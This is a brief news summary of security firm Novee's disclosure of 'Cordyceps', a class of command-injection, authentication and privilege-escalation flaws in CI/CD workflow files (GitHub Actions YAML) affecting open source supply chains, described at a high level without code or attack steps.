A cybersecurity firm, Novee, has identified a systemic class of vulnerabilities known as 'Cordyceps' in CI/CD workflows within open source software supply chains, affecting millions of repositories. These vulnerabilities allow unauthenticated attackers to exploit developer environments and potentially gain control over affected repositories. Key issues include command injection, authentication problems, and privilege escalation affecting popular tools from organizations like Microsoft, Google, and Apache.
Novee's findings indicate that these flaws can result in supply chain compromises, allowing attackers to forge approvals and exfiltrate sensitive information without needing any special privileges. The vulnerabilities are rooted in GitHub Actions YAML files and are not confined to GitHub but can affect any workflow management system.